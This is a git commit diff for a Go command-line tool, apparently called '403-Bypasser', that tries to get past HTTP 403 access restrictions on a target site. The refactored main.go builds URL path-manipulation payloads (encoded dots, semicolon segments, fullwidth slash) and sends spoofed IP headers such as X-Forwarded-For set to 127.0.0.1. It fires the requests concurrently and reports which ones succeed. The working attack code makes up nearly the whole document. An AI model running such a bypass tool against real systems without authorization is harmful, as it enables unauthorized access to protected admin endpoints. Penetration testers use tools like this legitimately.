commit
9c1edf9fc7
|
@ -0,0 +1,2 @@
|
|||
fmt:
|
||||
@gofmt -w -s main.go && goimports -w main.go && go vet main.go
|
196
main.go
196
main.go
|
@ -1,46 +1,21 @@
|
|||
package main
|
||||
|
||||
import (
|
||||
"context"
|
||||
"flag"
|
||||
"fmt"
|
||||
"log"
|
||||
"net/http"
|
||||
"os"
|
||||
"regexp"
|
||||
"runtime"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
var Red = "\033[31m"
|
||||
var Green = "\033[32m"
|
||||
var White = "\033[97m"
|
||||
|
||||
func main() {
|
||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||
flag.Parse()
|
||||
|
||||
if *domain == "" || *path == "" {
|
||||
log.Fatalln("Using flag -url and -path")
|
||||
os.Exit(0)
|
||||
}
|
||||
|
||||
upperCase := strings.ToUpper(*path)
|
||||
|
||||
endpoint := []string{
|
||||
*domain + "/" + upperCase,
|
||||
*domain + "/" + *path + "/",
|
||||
*domain + "/" + *path + "/.",
|
||||
*domain + "//" + *path + "//",
|
||||
*domain + "/./" + *path + "/./",
|
||||
*domain + "/./" + *path + "/..",
|
||||
*domain + "/;/" + *path,
|
||||
*domain + "/.;/" + *path,
|
||||
*domain + "//;//" + *path,
|
||||
*domain + "/" + *path + "..;/",
|
||||
*domain + "/%2e/" + *path,
|
||||
*domain + "/%252e/" + *path,
|
||||
*domain + "/%ef%bc%8f" + *path}
|
||||
|
||||
headers := []string{
|
||||
var (
|
||||
reURL = regexp.MustCompile("^https?://")
|
||||
headerPayloads = []string{
|
||||
"X-Custom-IP-Authorization",
|
||||
"X-Originating-IP",
|
||||
"X-Forwarded-For",
|
||||
|
@ -49,52 +24,127 @@ func main() {
|
|||
"X-Host",
|
||||
"X-Forwarded-Host",
|
||||
"X-ProxyUser-Ip",
|
||||
"X-Remote-Addr"}
|
||||
"X-Remote-Addr",
|
||||
}
|
||||
)
|
||||
|
||||
fmt.Println(Green, " _ _ ___ ____ ____ ")
|
||||
fmt.Println(Green, "| || | / _ \\___ \\ | _ \\ ")
|
||||
fmt.Println(Green, "| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __ ")
|
||||
fmt.Println(Green, "|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__| ")
|
||||
fmt.Println(Green, " | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ | ")
|
||||
fmt.Println(Green, " |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_| ")
|
||||
fmt.Println(Green, " __/ | | ")
|
||||
fmt.Println(Green, " |___/|_| v1.0.2", White)
|
||||
const (
|
||||
version string = "v1.1.0"
|
||||
red string = "\033[31m"
|
||||
green string = "\033[32m"
|
||||
white string = "\033[97m"
|
||||
|
||||
fmt.Println("\nDomain:", *domain)
|
||||
fmt.Println("Path:", *path)
|
||||
headerValue string = "127.0.0.1"
|
||||
)
|
||||
|
||||
fmt.Println("\nNormal Request")
|
||||
for i, str := range endpoint {
|
||||
req, err := http.Get(str)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
output := fmt.Sprintf("%s %d %s", str, req.StatusCode, http.StatusText(req.StatusCode))
|
||||
if req.StatusCode == 200 {
|
||||
fmt.Println(Green, i+1, output, White)
|
||||
} else {
|
||||
fmt.Println(Red, i+1, output, White)
|
||||
}
|
||||
func showBanner() {
|
||||
fmt.Printf("%s %s %s %s %s %s %s %s %s %s %s\n", green,
|
||||
" _ _ ___ ____ ____\n",
|
||||
"| || | / _ \\___ \\ | _ \\\n",
|
||||
"| || |_| | | |__) |_____| |_) |_ _ _ __ __ _ ___ ___ ___ _ __\n",
|
||||
"|__ _| | | |__ <______| _ <| | | | '_ \\ / _` / __/ __|/ _ \\ '__|\n",
|
||||
" | | | |_| |__) | | |_) | |_| | |_) | (_| \\__ \\__ \\ __/ |\n",
|
||||
" |_| \\___/____/ |____/ \\__, | .__/ \\__,_|___/___/\\___|_|\n",
|
||||
" __/ | |\n",
|
||||
" |___/|_| ",
|
||||
version, white)
|
||||
}
|
||||
|
||||
func getValidDomain(domain string) string {
|
||||
trimmedDomain := strings.TrimSpace(domain)
|
||||
|
||||
if !reURL.MatchString(trimmedDomain) {
|
||||
trimmedDomain = "https://" + trimmedDomain
|
||||
}
|
||||
|
||||
fmt.Println("\nRequest with Headers")
|
||||
for j, head := range headers {
|
||||
req2, err := http.NewRequest("GET", *domain+"/"+*path, nil)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
req2.Header.Set(head, "127.0.0.1")
|
||||
resp, err := http.DefaultClient.Do(req2)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
output2 := fmt.Sprintf("%s %s %d %s", head, *domain+"/"+*path, resp.StatusCode, http.StatusText(resp.StatusCode))
|
||||
return trimmedDomain
|
||||
}
|
||||
|
||||
if resp.StatusCode == 200 {
|
||||
fmt.Println(Green, j+1, output2, White)
|
||||
} else {
|
||||
fmt.Println(Red, j+1, output2, White)
|
||||
}
|
||||
func constructEndpointPayloads(domain, path string) []string {
|
||||
return []string{
|
||||
domain + "/" + strings.ToUpper(path),
|
||||
domain + "/" + path + "/",
|
||||
domain + "/" + path + "/.",
|
||||
domain + "//" + path + "//",
|
||||
domain + "/./" + path + "/./",
|
||||
domain + "/./" + path + "/..",
|
||||
domain + "/;/" + path,
|
||||
domain + "/.;/" + path,
|
||||
domain + "//;//" + path,
|
||||
domain + "/" + path + "..;/",
|
||||
domain + "/%2e/" + path,
|
||||
domain + "/%252e/" + path,
|
||||
domain + "/%ef%bc%8f" + path,
|
||||
}
|
||||
}
|
||||
|
||||
func penetrateEndpoint(wg *sync.WaitGroup, url string, header ...string) {
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
|
||||
defer cancel()
|
||||
defer wg.Done()
|
||||
|
||||
req, err := http.NewRequestWithContext(ctx, http.MethodGet, url, nil)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
|
||||
var h string
|
||||
if header != nil {
|
||||
h = header[0]
|
||||
req.Header.Set(h, headerValue)
|
||||
}
|
||||
|
||||
resp, err := http.DefaultClient.Do(req)
|
||||
if err != nil {
|
||||
log.Fatal(err)
|
||||
}
|
||||
defer resp.Body.Close()
|
||||
|
||||
color := green
|
||||
if resp.StatusCode != 200 {
|
||||
color = red
|
||||
}
|
||||
|
||||
log.Println(color, h, url, resp.StatusCode, http.StatusText(resp.StatusCode), white)
|
||||
}
|
||||
|
||||
func main() {
|
||||
runtime.GOMAXPROCS(1)
|
||||
|
||||
domain := flag.String("url", "", "A domain with the protocol. Example: https://daffa.tech")
|
||||
path := flag.String("path", "", "An endpoint. Example: admin")
|
||||
flag.Parse()
|
||||
|
||||
if *domain == "" || *path == "" {
|
||||
log.Fatalln("Using flag -url and -path")
|
||||
}
|
||||
|
||||
validDomain := getValidDomain(*domain)
|
||||
validPath := strings.TrimSpace(*path)
|
||||
endpoints := constructEndpointPayloads(validDomain, validPath)
|
||||
|
||||
showBanner()
|
||||
|
||||
fmt.Println("\nDomain:", validDomain)
|
||||
fmt.Println("Path:", validPath)
|
||||
|
||||
fmt.Println("\nNormal Request")
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(len(endpoints))
|
||||
|
||||
for _, e := range endpoints {
|
||||
go penetrateEndpoint(&wg, e)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
|
||||
fmt.Println("\nRequest with Headers")
|
||||
wg.Add(len(headerPayloads))
|
||||
|
||||
for _, h := range headerPayloads {
|
||||
go penetrateEndpoint(&wg, validDomain+"/"+validPath, h)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue